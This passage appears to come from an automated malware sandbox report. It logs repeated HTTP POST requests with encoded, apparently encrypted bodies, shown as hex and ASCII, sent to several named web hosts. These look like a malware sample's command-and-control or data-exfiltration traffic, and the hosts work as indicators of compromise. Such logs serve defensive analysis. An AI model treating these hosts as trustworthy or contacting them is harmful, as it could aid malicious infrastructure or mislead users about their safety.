ICqgNFPrdAnbD6zIGvg8SPxUOXk5RLa7NybFqx9pHxxMQRka+JvYugC0BMr8xJQ7xANt9KntRltoCw6J2rna4qZY/dlUVHrIDCn7GbKaA/pOu/ubt7AuWT15F3X7pOCqrA1rVoPRd1n+9uEf13bHi8QIdrKIhPDHi81LvUp9I9JGitTMdfdt5+KesJHvdvA8KIF3jNWSUD54/WACIBOB9U8mQxY+8RMaF15aGdGNqZK6+C58Ykfvaj1i0QOlAsIdSJSKY+tE7uycGplH82yncPQxssHqkP2+xOgVfuYAGJhEwnYTt5LuGAQx9NUEdIzuWrA98FR7LXdSYtkps/57GOQb6fqociSRo/bTASGmMansdgOsBXPGAZISXGQwESAL5SJlEO8G1TvUEMXRja0EicO1uECujl7p6byue20PdhQJT1qSJ0jkblxe5T9+abhl3wyF2sdBESscsNQcNoZrvcG+3KEHrhVNveDDGNwK6QWS/NdJ3fXk267GKv7xWOHNLcoe+/S5n27yqlXR2YDd3pEKpHlsEdyXbBeNvO6v2k7cr+XxKnwHArmupAZ0ecNh+CUuUV39Od88k01GM5hX9Rl0
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 63 61 50 34 65 76 70 43 58 67 6d 6f 62 58 72 75 6e 66 5a 52 7a 7a 30 36 54 48 4e 71 33 70 48 7a 7a 6e 7a 32 65 62 44 43 6e 52 4a 71 50 44 2b 7a 59 33 4a 42 6b 44 48 77 69 30 6f 78 66 54 51 47 6d 35 79 74 54 6b 64 48 41 5a 4a 67 6a 58 30 6e 75 38 31 50 38 44 66 54 37 6a 71 32 50 79 54 6b 47 49 50 6f 36 6d 35 49 36 30 32 30 35 78 4a 43 38 39 76 55 61 57 6b 47 71 64 64 49 56 52 65 6e 6f 44 79 6d 70 73 52 38 35 44 54 30 35 4f 69 7a 63 61 2b 36 52 70 33 4f 44 31 36 4e 76 32 68 64 50 65 48 7a 6d 50 42 42 4d 4f 56 6a 2f 58 37 73 61 72 55 41 35 35 65 4f 78 41 4b 56 6f 79 4e 54 57 37 73 69 46 31 6c 32 45 50 32 49 76 56 65 70 72 5a 62 4a 35 4c 6d 33 4e 31 59 47 74 38 74 47 63 77 70 30 5a 51 72 4d 47 52 43 2b 33 48 36 64 7a 54 47 52 79 4a 2b 32 68 59 41 58 36 57 67 7a 4f 30 42 31 45 50 6f 77 55 2b 42 70 34 49 67 72 2b 69 71 5a 33 71 51 76 64 72 34 71 72 76 4a 4f 46 31 39 48 71 62 4d 6b 68 2f 51 5a 35 43 5a 58 41 4e 4f 6c 31 75 38 36 72 6e 71 53 41 35 53 68 76 53 57 45 4d 48 64 74 68 7a 66 50 44 57 53 56 74 52 69 45 4e 6f 72 6f 56 6c 59 52 66 54 65 76 76 71 47 6b 34 31 78 2b 5a 7a 68 53 35 75 44 34 64 6e 7a 66 34 43 69 74 69 54 4a 73 4b 78 54 63 39 39 4c 33 44 30 56 57 61 34 68 68 4c 6c 54 62 41 44 64 43 33 65 5a 6e 54 49 61 4c 63 50 36 6b 69 38 58 2b 45 44 42 54 6c 2b 58 58 56 6e 65 33 43 30 4e 43 41 65 4f 51 47 57 66 6b 43 71 38 37 58 62 33 67 70 53 4a 4a 76 49 47 5a 6d 59 65 54 38 79 4c 5a 4e 70 46 5a 76 48 4a 75 57 65 48 57 33 76 46 30 56 66 76 48 43 79 42 47 31 56 2f 4f 37 30 44 76 41 30 4b 49 33 62 4e 68 6a 51 47 7a 77 38 46 51 42 6e 74 68 48 56 46 52 73 4e 63 37 76 31 79 69 4c 6f 4d 42 75 50 69 78 32 78 54 2b 47 63 76 46 79 64 4d 79 6d 2b 2b 52 75 39 58 76 73 36 54 57 6a 2f 76 51 49 6d 39 4a 4a 45 59 3d Data Ascii: caP4evpCXgmobXrunfZRzz06THNq3pHzznz2ebDCnRJqPD+zY3JBkDHwi0oxfTQGm5ytTkdHAZJgjX0nu81P8DfT7jq2PyTkGIPo6m5I60205xJC89vUaWkGqddIVRenoDympsR85DT05Oizca+6Rp3OD16Nv2hdPeHzmPBBMOVj/X7sarUA55eOxAKVoyNTW7siF1l2EP2IvVeprZbJ5Lm3N1YGt8tGcwp0ZQrMGRC+3H6dzTGRyJ+2hYAX6WgzO0B1EPowU+Bp4Igr+iqZ3qQvdr4qrvJOF19HqbMkh/QZ5CZXANOl1u86rnqSA5ShvSWEMHdthzfPDWSVtRiENoroVlYRfTevvqGk41x+ZzhS5uD4dnzf4CitiTJsKxTc99L3D0VWa4hhLlTbADdC3eZnTIaLcP6ki8X+EDBTl+XXVne3C0NCAeOQGWfkCq87Xb3gpSJJvIGZmYeT8yLZNpFZvHJuWeHW3vF0VfvHCyBG1V/O70DvA0KI3bNhjQGzw8FQBnthHVFRsNc7v1yiLoMBuPix2xT+GcvFydMym++Ru9Xvs6TWj/vQIm9JJEY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 49 43 71 67 4e 46 50 72 64 41 6e 62 44 36 7a 49 47 76 67 38 53 50 78 55 4f 58 6b 35 52 4c 61 37 4e 79 62 46 71 78 39 70 48 78 78 4d 51 52 6b 61 2b 4a 76 59 75 67 43 30 42 4d 72 38 78 4a 51 37 78 41 4e 74 39 4b 6e 74 52 6c 74 6f 43 77 36 4a 32 72 6e 61 34 71 5a 59 2f 64 6c 55 56 48 72 49 44 43 6e 37 47 62 4b 61 41 2f 70 4f 75 2f 75 62 74 37 41 75 57 54 31 35 46 33 58 37 70 4f 43 71 72 41 31 72 56 6f 50 52 64 31 6e 2b 39 75 45 66 31 33 62 48 69 38 51 49 64 72 4b 49 68 50 44 48 69 38 31 4c 76 55 70 39 49 39 4a 47 69 74 54 4d 64 66 64 74 35 2b 4b 65 73 4a 48 76 64 76 41 38 4b 49 46 33 6a 4e 57 53 55 44 35 34 2f 57 41 43 49 42 4f 42 39 55 38 6d 51 78 59 2b 38 52 4d 61 46 31 35 61 47 64 47 4e 71 5a 4b 36 2b 43 35 38 59 6b 66 76 61 6a 31 69 30 51 4f 6c 41 73 49 64 53 4a 53 4b 59 2b 74 45 37 75 79 63 47 70 6c 48 38 32 79 6e 63 50 51 78 73 73 48 71 6b 50 32 2b 78 4f 67 56 66 75 59 41 47 4a 68 45 77 6e 59 54 74 35 4c 75 47 41 51 78 39 4e 55 45 64 49 7a 75 57 72 41 39 38 46 52 37 4c 58 64 53 59 74 6b 70 73 2f 35 37 47 4f 51 62 36 66 71 6f 63 69 53 52 6f 2f 62 54 41 53 47 6d 4d 61 6e 73 64 67 4f 73 42 58 50 47 41 5a 49 53 58 47 51 77 45 53 41 4c 35 53 4a 6c 45 4f 38 47 31 54 76 55 45 4d 58 52 6a 61 30 45 69 63 4f 31 75 45 43 75 6a 6c 37 70 36 62 79 75 65 32 30 50 64 68 51 4a 54 31 71 53 4a 30 6a 6b 62 6c 78 65 35 54 39 2b 61 62 68 6c 33 77 79 46 32 73 64 42 45 53 73 63 73 4e 51 63 4e 6f 5a 72 76 63 47 2b 33 4b 45 48 72 68 56 4e 76 65 44 44 47 4e 77 4b 36 51 57 53 2f 4e 64 4a 33 66 58 6b 32 36 37 47 4b 76 37 78 57 4f 48 4e 4c 63 6f 65 2b 2f 53 35 6e 32 37 79 71 6c 58 52 32 59 44 64 33 70 45 4b 70 48 6c 73 45 64 79 58 62 42 65 4e 76 4f 36 76 32 6b 37 63 72 2b 58 78 4b 6e 77 48 41 72 6d 75 70 41 5a 30 65 63 4e 68 2b 43 55 75 55 56 33 39 4f 64 38 38 6b 30 31 47 4d 35 68 58 39 52 6c 30 Data Ascii: ICqgNFPrdAnbD6zIGvg8SPxUOXk5RLa7NybFqx9pHxxMQRka+JvYugC0BMr8xJQ7xANt9KntRltoCw6J2rna4qZY/dlUVHrIDCn7GbKaA/pOu/ubt7AuWT15F3X7pOCqrA1rVoPRd1n+9uEf13bHi8QIdrKIhPDHi81LvUp9I9JGitTMdfdt5+KesJHvdvA8KIF3jNWSUD54/WACIBOB9U8mQxY+8RMaF15aGdGNqZK6+C58Ykfvaj1i0QOlAsIdSJSKY+tE7uycGplH82yncPQxssHqkP2+xOgVfuYAGJhEwnYTt5LuGAQx9NUEdIzuWrA98FR7LXdSYtkps/57GOQb6fqociSRo/bTASGmMansdgOsBXPGAZISXGQwESAL5SJlEO8G1TvUEMXRja0EicO1uECujl7p6byue20PdhQJT1qSJ0jkblxe5T9+abhl3wyF2sdBESscsNQcNoZrvcG+3KEHrhVNveDDGNwK6QWS/NdJ3fXk267GKv7xWOHNLcoe+/S5n27yqlXR2YDd3pEKpHlsEdyXbBeNvO6v2k7cr+XxKnwHArmupAZ0ecNh+CUuUV39Od88k01GM5hX9Rl0
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 41 54 36 4c 35 42 71 53 6b 77 6d 58 70 51 54 6c 50 62 71 74 79 56 33 32 37 4f 30 4b 62 4e 43 58 37 69 32 75 4f 4d 71 39 67 37 71 34 74 45 67 4c 69 45 63 2b 79 2b 57 63 74 6c 33 77 76 74 49 48 6a 4f 31 6d 57 6b 42 2b 6f 62 67 5a 70 30 69 51 47 55 2f 2b 35 6d 55 75 6c 48 59 50 34 75 54 2f 2f 5a 33 6a 37 4e 39 35 4b 43 63 61 34 5a 4a 79 76 44 6a 38 53 78 50 53 43 33 6b 53 38 6e 78 69 37 38 4c 53 58 74 62 76 6d 33 4e 4b 6c 56 68 49 47 33 32 42 6b 44 41 56 43 66 72 6a 38 52 75 64 4d 6c 48 4a 33 55 75 61 4c 47 4c 32 51 2b 4d 76 51 6d 68 2b 47 52 32 4d 69 72 69 4d 75 2b 63 39 71 64 50 46 46 50 76 70 38 65 58 56 43 62 4c 44 65 74 44 62 73 47 6f 6c 7a 52 38 73 75 52 77 34 51 4d 4d 2b 38 33 46 70 70 41 6a 6c 74 66 32 62 6f 2f 57 62 76 62 38 54 6c 53 6a 38 41 59 46 4a 34 50 6b 6a 54 73 72 4f 65 51 52 32 41 6e 49 75 36 36 67 67 7a 2b 51 73 4b 38 54 48 2b 31 58 53 62 34 35 68 62 31 68 6f 64 6a 54 2f 74 61 6b 56 73 48 36 79 4f 30 44 4d 61 35 5a 5a 71 52 72 4e 47 38 6a 63 5a 6c 75 57 52 2b 68 74 42 65 54 67 46 6b 37 71 4d 5a 63 64 4a 63 61 55 2f 57 58 72 4e 47 68 4e 2b 62 51 63 77 77 58 75 2b 31 57 4f 70 50 6d 71 4e 4f 37 75 78 70 69 48 61 4f 6c 74 42 69 57 73 6e 2f 70 62 2b 39 32 44 59 35 65 44 74 6d 6e 4a 45 59 4f 6e 30 4e 6d 59 44 62 6c 36 6c 76 48 64 32 54 6b 59 2f 58 67 66 63 67 6d 57 46 32 41 76 79 2b 76 69 4a 75 37 39 69 34 72 55 56 41 78 63 5a 4b 45 58 49 4c 64 30 34 6e 45 43 2b 44 35 6d 63 43 54 6f 56 53 76 66 5a 53 7a 41 6d 6c 6a 63 30 64 75 2b 32 51 73 46 75 65 41 48 56 54 61 30 4d 47 6f 34 62 69 50 6b 32 35 79 30 2f 70 56 31 73 5a 4c 73 5a 6e 4f 67 43 77 4f 74 45 70 68 4b 6c 43 52 5a 41 53 57 73 54 67 33 73 43 2b 31 6c 42 4d 4d 34 36 41 78 59 4b 72 59 39 44 7a 74 72 57 46 35 4b 32 72 4a 32 79 6f 78 54 2b 44 6f 45 47 51 3d 3d Data Ascii: AT6L5BqSkwmXpQTlPbqtyV327O0KbNCX7i2uOMq9g7q4tEgLiEc+y+Wctl3wvtIHjO1mWkB+obgZp0iQGU/+5mUulHYP4uT//Z3j7N95KCca4ZJyvDj8SxPSC3kS8nxi78LSXtbvm3NKlVhIG32BkDAVCfrj8RudMlHJ3UuaLGL2Q+MvQmh+GR2MiriMu+c9qdPFFPvp8eXVCbLDetDbsGolzR8suRw4QMM+83FppAjltf2bo/Wbvb8TlSj8AYFJ4PkjTsrOeQR2AnIu66ggz+QsK8TH+1XSb45hb1hodjT/takVsH6yO0DMa5ZZqRrNG8jcZluWR+htBeTgFk7qMZcdJcaU/WXrNGhN+bQcwwXu+1WOpPmqNO7uxpiHaOltBiWsn/pb+92DY5eDtmnJEYOn0NmYDbl6lvHd2TkY/XgfcgmWF2Avy+viJu79i4rUVAxcZKEXILd04nEC+D5mcCToVSvfZSzAmljc0du+2QsFueAHVTa0MGo4biPk25y0/pV1sZLsZnOgCwOtEphKlCRZASWsTg3sC+1lBMM46AxYKrY9DztrWF5K2rJ2yoxT+DoEGQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 41 54 36 4c 35 42 71 53 6b 77 6d 58 70 51 54 6c 50 62 71 74 79 56 33 32 37 4f 30 4b 62 4e 43 58 37 69 32 75 4f 4d 71 39 67 37 71 34 74 45 67 4c 69 45 63 2b 79 2b 57 63 74 6c 33 77 76 74 49 48 6a 4f 31 6d 57 6b 42 2b 6f 62 67 5a 70 30 69 51 47 55 2f 2b 35 6d 55 75 6c 48 59 50 34 75 54 2f 2f 5a 33 6a 37 4e 39 35 4b 43 63 61 34 5a 4a 79 76 44 6a 38 53 78 50 53 43 33 6b 53 38 6e 78 69 37 38 4c 53 58 74 62 76 6d 33 4e 4b 6c 56 68 49 47 33 32 42 6b 44 41 56 43 66 72 6a 38 52 75 64 4d 6c 48 4a 33 55 75 61 4c 47 4c 32 51 2b 4d 76 51 6d 68 2b 47 52 32 4d 69 72 69 4d 75 2b 63 39 71 64 50 46 46 50 76 70 38 65 58 56 43 62 4c 44 65 74 44 62 73 47 6f 6c 7a 52 38 73 75 52 77 34 51 4d 4d 2b 38 33 46 70 70 41 6a 6c 74 66 32 62 6f 2f 57 62 76 62 38 54 6c 53 6a 38 41 59 46 4a 34 50 6b 6a 54 73 72 4f 65 51 52 32 41 6e 49 75 36 36 67 67 7a 2b 51 73 4b 38 54 48 2b 31 58 53 62 34 35 68 62 31 68 6f 64 6a 54 2f 74 61 6b 56 73 48 36 79 4f 30 44 4d 61 35 5a 5a 71 52 72 4e 47 38 6a 63 5a 6c 75 57 52 2b 68 74 42 65 54 67 46 6b 37 71 4d 5a 63 64 4a 63 61 55 2f 57 58 72 4e 47 68 4e 2b 62 51 63 77 77 58 75 2b 31 57 4f 70 50 6d 71 4e 4f 37 75 78 70 69 48 61 4f 6c 74 42 69 57 73 6e 2f 70 62 2b 39 32 44 59 35 65 44 74 6d 6e 4a 45 59 4f 6e 30 4e 6d 59 44 62 6c 36 6c 76 48 64 32 54 6b 59 2f 58 67 66 63 67 6d 57 46 32 41 76 79 2b 76 69 4a 75 37 39 69 34 72 55 56 41 78 63 5a 4b 45 58 49 4c 64 30 34 6e 45 43 2b 44 35 6d 63 43 54 6f 56 53 76 66 5a 53 7a 41 6d 6c 6a 63 30 64 75 2b 32 51 73 46 75 65 41 48 56 54 61 30 4d 47 6f 34 62 69 50 6b 32 35 79 30 2f 70 56 31 73 5a 4c 73 5a 6e 4f 67 43 77 4f 74 45 70 68 4b 6c 43 52 5a 41 53 57 73 54 67 33 73 43 2b 31 6c 42 4d 4d 34 36 41 78 59 4b 72 59 39 44 7a 74 72 57 46 35 4b 32 72 4a 32 79 6f 78 54 2b 44 6f 45 47 51 3d 3d Data Ascii: AT6L5BqSkwmXpQTlPbqtyV327O0KbNCX7i2uOMq9g7q4tEgLiEc+y+Wctl3wvtIHjO1mWkB+obgZp0iQGU/+5mUulHYP4uT//Z3j7N95KCca4ZJyvDj8SxPSC3kS8nxi78LSXtbvm3NKlVhIG32BkDAVCfrj8RudMlHJ3UuaLGL2Q+MvQmh+GR2MiriMu+c9qdPFFPvp8eXVCbLDetDbsGolzR8suRw4QMM+83FppAjltf2bo/Wbvb8TlSj8AYFJ4PkjTsrOeQR2AnIu66ggz+QsK8TH+1XSb45hb1hodjT/takVsH6yO0DMa5ZZqRrNG8jcZluWR+htBeTgFk7qMZcdJcaU/WXrNGhN+bQcwwXu+1WOpPmqNO7uxpiHaOltBiWsn/pb+92DY5eDtmnJEYOn0NmYDbl6lvHd2TkY/XgfcgmWF2Avy+viJu79i4rUVAxcZKEXILd04nEC+D5mcCToVSvfZSzAmljc0du+2QsFueAHVTa0MGo4biPk25y0/pV1sZLsZnOgCwOtEphKlCRZASWsTg3sC+1lBMM46AxYKrY9DztrWF5K2rJ2yoxT+DoEGQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 41 54 36 4c 35 42 71 53 6b 77 6d 58 70 51 54 6c 50 62 71 74 79 56 33 32 37 4f 30 4b 62 4e 43 58 37 69 32 75 4f 4d 71 39 67 37 71 34 74 45 67 4c 69 45 63 2b 79 2b 57 63 74 6c 33 77 76 74 49 48 6a 4f 31 6d 57 6b 42 2b 6f 62 67 5a 70 30 69 51 47 55 2f 2b 35 6d 55 75 6c 48 59 50 34 75 54 2f 2f 5a 33 6a 37 4e 39 35 4b 43 63 61 34 5a 4a 79 76 44 6a 38 53 78 50 53 43 33 6b 53 38 6e 78 69 37 38 4c 53 58 74 62 76 6d 33 4e 4b 6c 56 68 49 47 33 32 42 6b 44 41 56 43 66 72 6a 38 52 75 64 4d 6c 48 4a 33 55 75 61 4c 47 4c 32 51 2b 4d 76 51 6d 68 2b 47 52 32 4d 69 72 69 4d 75 2b 63 39 71 64 50 46 46 50 76 70 38 65 58 56 43 62 4c 44 65 74 44 62 73 47 6f 6c 7a 52 38 73 75 52 77 34 51 4d 4d 2b 38 33 46 70 70 41 6a 6c 74 66 32 62 6f 2f 57 62 76 62 38 54 6c 53 6a 38 41 59 46 4a 34 50 6b 6a 54 73 72 4f 65 51 52 32 41 6e 49 75 36 36 67 67 7a 2b 51 73 4b 38 54 48 2b 31 58 53 62 34 35 68 62 31 68 6f 64 6a 54 2f 74 61 6b 56 73 48 36 79 4f 30 44 4d 61 35 5a 5a 71 52 72 4e 47 38 6a 63 5a 6c 75 57 52 2b 68 74 42 65 54 67 46 6b 37 71 4d 5a 63 64 4a 63 61 55 2f 57 58 72 4e 47 68 4e 2b 62 51 63 77 77 58 75 2b 31 57 4f 70 50 6d 71 4e 4f 37 75 78 70 69 48 61 4f 6c 74 42 69 57 73 6e 2f 70 62 2b 39 32 44 59 35 65 44 74 6d 6e 4a 45 59 4f 6e 30 4e 6d 59 44 62 6c 36 6c 76 48 64 32 54 6b 59 2f 58 67 66 63 67 6d 57 46 32 41 76 79 2b 76 69 4a 75 37 39 69 34 72 55 56 41 78 63 5a 4b 45 58 49 4c 64 30 34 6e 45 43 2b 44 35 6d 63 43 54 6f 56 53 76 66 5a 53 7a 41 6d 6c 6a 63 30 64 75 2b 32 51 73 46 75 65 41 48 56 54 61 30 4d 47 6f 34 62 69 50 6b 32 35 79 30 2f 70 56 31 73 5a 4c 73 5a 6e 4f 67 43 77 4f 74 45 70 68 4b 6c 43 52 5a 41 53 57 73 54 67 33 73 43 2b 31 6c 42 4d 4d 34 36 41 78 59 4b 72 59 39 44 7a 74 72 57 46 35 4b 32 72 4a 32 79 6f 78 54 2b 44 6f 45 47 51 3d 3d Data Ascii: AT6L5BqSkwmXpQTlPbqtyV327O0KbNCX7i2uOMq9g7q4tEgLiEc+y+Wctl3wvtIHjO1mWkB+obgZp0iQGU/+5mUulHYP4uT//Z3j7N95KCca4ZJyvDj8SxPSC3kS8nxi78LSXtbvm3NKlVhIG32BkDAVCfrj8RudMlHJ3UuaLGL2Q+MvQmh+GR2MiriMu+c9qdPFFPvp8eXVCbLDetDbsGolzR8suRw4QMM+83FppAjltf2bo/Wbvb8TlSj8AYFJ4PkjTsrOeQR2AnIu66ggz+QsK8TH+1XSb45hb1hodjT/takVsH6yO0DMa5ZZqRrNG8jcZluWR+htBeTgFk7qMZcdJcaU/WXrNGhN+bQcwwXu+1WOpPmqNO7uxpiHaOltBiWsn/pb+92DY5eDtmnJEYOn0NmYDbl6lvHd2TkY/XgfcgmWF2Avy+viJu79i4rUVAxcZKEXILd04nEC+D5mcCToVSvfZSzAmljc0du+2QsFueAHVTa0MGo4biPk25y0/pV1sZLsZnOgCwOtEphKlCRZASWsTg3sC+1lBMM46AxYKrY9DztrWF5K2rJ2yoxT+DoEGQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 41 54 36 4c 35 42 71 53 6b 77 6d 58 70 51 54 6c 50 62 71 74 79 56 33 32 37 4f 30 4b 62 4e 43 58 37 69 32 75 4f 4d 71 39 67 37 71 34 74 45 67 4c 69 45 63 2b 79 2b 57 63 74 6c 33 77 76 74 49 48 6a 4f 31 6d 57 6b 42 2b 6f 62 67 5a 70 30 69 51 47 55 2f 2b 35 6d 55 75 6c 48 59 50 34 75 54 2f 2f 5a 33 6a 37 4e 39 35 4b 43 63 61 34 5a 4a 79 76 44 6a 38 53 78 50 53 43 33 6b 53 38 6e 78 69 37 38 4c 53 58 74 62 76 6d 33 4e 4b 6c 56 68 49 47 33 32 42 6b 44 41 56 43 66 72 6a 38 52 75 64 4d 6c 48 4a 33 55 75 61 4c 47 4c 32 51 2b 4d 76 51 6d 68 2b 47 52 32 4d 69 72 69 4d 75 2b 63 39 71 64 50 46 46 50 76 70 38 65 58 56 43 62 4c 44 65 74 44 62 73 47 6f 6c 7a 52 38 73 75 52 77 34 51 4d 4d 2b 38 33 46 70 70 41 6a 6c 74 66 32 62 6f 2f 57 62 76 62 38 54 6c 53 6a 38 41 59 46 4a 34 50 6b 6a 54 73 72 4f 65 51 52 32 41 6e 49 75 36 36 67 67 7a 2b 51 73 4b 38 54 48 2b 31 58 53 62 34 35 68 62 31 68 6f 64 6a 54 2f 74 61 6b 56 73 48 36 79 4f 30 44 4d 61 35 5a 5a 71 52 72 4e 47 38 6a 63 5a 6c 75 57 52 2b 68 74 42 65 54 67 46 6b 37 71 4d 5a 63 64 4a 63 61 55 2f 57 58 72 4e 47 68 4e 2b 62 51 63 77 77 58 75 2b 31 57 4f 70 50 6d 71 4e 4f 37 75 78 70 69 48 61 4f 6c 74 42 69 57 73 6e 2f 70 62 2b 39 32 44 59 35 65 44 74 6d 6e 4a 45 59 4f 6e 30 4e 6d 59 44 62 6c 36 6c 76 48 64 32 54 6b 59 2f 58 67 66 63 67 6d 57 46 32 41 76 79 2b 76 69 4a 75 37 39 69 34 72 55 56 41 78 63 5a 4b 45 58 49 4c 64 30 34 6e 45 43 2b 44 35 6d 63 43 54 6f 56 53 76 66 5a 53 7a 41 6d 6c 6a 63 30 64 75 2b 32 51 73 46 75 65 41 48 56 54 61 30 4d 47 6f 34 62 69 50 6b 32 35 79 30 2f 70 56 31 73 5a 4c 73 5a 6e 4f 67 43 77 4f 74 45 70 68 4b 6c 43 52 5a 41 53 57 73 54 67 33 73 43 2b 31 6c 42 4d 4d 34 36 41 78 59 4b 72 59 39 44 7a 74 72 57 46 35 4b 32 72 4a 32 79 6f 78 54 2b 44 6f 45 47 51 3d 3d Data Ascii: AT6L5BqSkwmXpQTlPbqtyV327O0KbNCX7i2uOMq9g7q4tEgLiEc+y+Wctl3wvtIHjO1mWkB+obgZp0iQGU/+5mUulHYP4uT//Z3j7N95KCca4ZJyvDj8SxPSC3kS8nxi78LSXtbvm3NKlVhIG32BkDAVCfrj8RudMlHJ3UuaLGL2Q+MvQmh+GR2MiriMu+c9qdPFFPvp8eXVCbLDetDbsGolzR8suRw4QMM+83FppAjltf2bo/Wbvb8TlSj8AYFJ4PkjTsrOeQR2AnIu66ggz+QsK8TH+1XSb45hb1hodjT/takVsH6yO0DMa5ZZqRrNG8jcZluWR+htBeTgFk7qMZcdJcaU/WXrNGhN+bQcwwXu+1WOpPmqNO7uxpiHaOltBiWsn/pb+92DY5eDtmnJEYOn0NmYDbl6lvHd2TkY/XgfcgmWF2Avy+viJu79i4rUVAxcZKEXILd04nEC+D5mcCToVSvfZSzAmljc0du+2QsFueAHVTa0MGo4biPk25y0/pV1sZLsZnOgCwOtEphKlCRZASWsTg3sC+1lBMM46AxYKrY9DztrWF5K2rJ2yoxT+DoEGQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 41 54 36 4c 35 42 71 53 6b 77 6d 58 70 51 54 6c 50 62 71 74 79 56 33 32 37 4f 30 4b 62 4e 43 58 37 69 32 75 4f 4d 71 39 67 37 71 34 74 45 67 4c 69 45 63 2b 79 2b 57 63 74 6c 33 77 76 74 49 48 6a 4f 31 6d 57 6b 42 2b 6f 62 67 5a 70 30 69 51 47 55 2f 2b 35 6d 55 75 6c 48 59 50 34 75 54 2f 2f 5a 33 6a 37 4e 39 35 4b 43 63 61 34 5a 4a 79 76 44 6a 38 53 78 50 53 43 33 6b 53 38 6e 78 69 37 38 4c 53 58 74 62 76 6d 33 4e 4b 6c 56 68 49 47 33 32 42 6b 44 41 56 43 66 72 6a 38 52 75 64 4d 6c 48 4a 33 55 75 61 4c 47 4c 32 51 2b 4d 76 51 6d 68 2b 47 52 32 4d 69 72 69 4d 75 2b 63 39 71 64 50 46 46 50 76 70 38 65 58 56 43 62 4c 44 65 74 44 62 73 47 6f 6c 7a 52 38 73 75 52 77 34 51 4d 4d 2b 38 33 46 70 70 41 6a 6c 74 66 32 62 6f 2f 57 62 76 62 38 54 6c 53 6a 38 41 59 46 4a 34 50 6b 6a 54 73 72 4f 65 51 52 32 41 6e 49 75 36 36 67 67 7a 2b 51 73 4b 38 54 48 2b 31 58 53 62 34 35 68 62 31 68 6f 64 6a 54 2f 74 61 6b 56 73 48 36 79 4f 30 44 4d 61 35 5a 5a 71 52 72 4e 47 38 6a 63 5a 6c 75 57 52 2b 68 74 42 65 54 67 46 6b 37 71 4d 5a 63 64 4a 63 61 55 2f 57 58 72 4e 47 68 4e 2b 62 51 63 77 77 58 75 2b 31 57 4f 70 50 6d 71 4e 4f 37 75 78 70 69 48 61 4f 6c 74 42 69 57 73 6e 2f 70 62 2b 39 32 44 59 35 65 44 74 6d 6e 4a 45 59 4f 6e 30 4e 6d 59 44 62 6c 36 6c 76 48 64 32 54 6b 59 2f 58 67 66 63 67 6d 57 46 32 41 76 79 2b 76 69 4a 75 37 39 69 34 72 55 56 41 78 63 5a 4b 45 58 49 4c 64 30 34 6e 45 43 2b 44 35 6d 63 43 54 6f 56 53 76 66 5a 53 7a 41 6d 6c 6a 63 30 64 75 2b 32 51 73 46 75 65 41 48 56 54 61 30 4d 47 6f 34 62 69 50 6b 32 35 79 30 2f 70 56 31 73 5a 4c 73 5a 6e 4f 67 43 77 4f 74 45 70 68 4b 6c 43 52 5a 41 53 57 73 54 67 33 73 43 2b 31 6c 42 4d 4d 34 36 41 78 59 4b 72 59 39 44 7a 74 72 57 46 35 4b 32 72 4a 32 79 6f 78 54 2b 44 6f 45 47 51 3d 3d Data Ascii: AT6L5BqSkwmXpQTlPbqtyV327O0KbNCX7i2uOMq9g7q4tEgLiEc+y+Wctl3wvtIHjO1mWkB+obgZp0iQGU/+5mUulHYP4uT//Z3j7N95KCca4ZJyvDj8SxPSC3kS8nxi78LSXtbvm3NKlVhIG32BkDAVCfrj8RudMlHJ3UuaLGL2Q+MvQmh+GR2MiriMu+c9qdPFFPvp8eXVCbLDetDbsGolzR8suRw4QMM+83FppAjltf2bo/Wbvb8TlSj8AYFJ4PkjTsrOeQR2AnIu66ggz+QsK8TH+1XSb45hb1hodjT/takVsH6yO0DMa5ZZqRrNG8jcZluWR+htBeTgFk7qMZcdJcaU/WXrNGhN+bQcwwXu+1WOpPmqNO7uxpiHaOltBiWsn/pb+92DY5eDtmnJEYOn0NmYDbl6lvHd2TkY/XgfcgmWF2Avy+viJu79i4rUVAxcZKEXILd04nEC+D5mcCToVSvfZSzAmljc0du+2QsFueAHVTa0MGo4biPk25y0/pV1sZLsZnOgCwOtEphKlCRZASWsTg3sC+1lBMM46AxYKrY9DztrWF5K2rJ2yoxT+DoEGQ==
